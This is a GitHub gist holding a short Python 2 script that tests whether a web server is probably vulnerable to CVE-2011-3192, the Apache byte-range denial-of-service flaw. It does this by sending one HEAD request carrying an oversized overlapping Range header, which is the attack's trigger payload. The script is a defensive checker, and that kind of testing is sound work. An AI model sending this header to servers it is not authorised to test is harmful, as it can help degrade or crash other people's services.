/cve-2011-3192.py
Created Aug 25, 2011
| #!/usr/bin/env python | |
| """ | |
| Test the probabilty of a URL being vulnerable to CVE-2011-3192 | |
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192 | |
| Both this test and real PoC are largely dependent on the content being | |
| served. Dynamic content rendered by mod_php and mod_wsgi is unlikely to be | |
| affected, whereas static or proxied content from the same VirtualHost or | |
| Apache instance may still be vulnerable. For this reason it is worth testing | |
| a variety of different URLs on each server. | |
| @dancarley | |
| """ | |
| import sys | |
| import httplib2 | |
| from pprint import pprint | |
| from urlparse import urlparse | |
| if len(sys.argv) != 2: | |
| sys.exit("Usage: %s URL" % sys.argv[0]) | |
| url = sys.argv[1] | |
| urlparse(url) | |
| headers = { | |
| "Range": "bytes=0-%s" % "".join( | |
| [",5-%s" % x for x in range(1,1301)] | |
| ), | |
| "Accept-Encoding": "gzip", | |
| "Connection": "close", | |
| } | |
| h = httplib2.Http() | |
| resp, cont = h.request(url, "HEAD", headers=headers) | |
| result = "address %r is probably" % url | |
| pprint(resp) | |
| if resp["status"] == "206" and int(resp["content-length"]) > 90000: | |
| print "\n%s vulnerable" % result | |
| else: | |
| print "\n%s NOT vulnerable" % result |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment